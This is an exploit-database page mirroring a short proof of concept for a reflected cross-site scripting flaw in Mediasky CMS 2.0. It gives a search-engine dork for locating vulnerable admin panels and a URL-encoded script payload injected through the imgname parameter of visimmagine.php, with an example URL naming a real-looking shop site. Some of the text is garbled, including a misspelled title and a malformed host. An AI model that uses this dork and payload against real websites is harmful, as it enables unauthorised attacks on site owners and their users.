Advertisement






Italia Mediasky CMS 2.0 Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 N/A Unknown
Author Risk Exploitation Type Date
Unknown Unknown Remote 2023-09-18
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090059

Below is a copy:

Italia Mediasky CMS 2.0 Cross Site Scripting
====================================================================================================================================
| # Title     : talia Mediasky CMS v2.0 XSS Vulnerability                                                                         |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            |
| # Vendor    : http://www.bereewineshop.com/admin/                                                                                |  
| # Dork      : Mediasky - Lato Amministrativo                                                                                     |
====================================================================================================================================


poc :

[+] Dorking n Google Or Other Search Enggine 

[+] use payload : /admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E

[+] http://www.127.0.0.9bereewineshopcom/admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.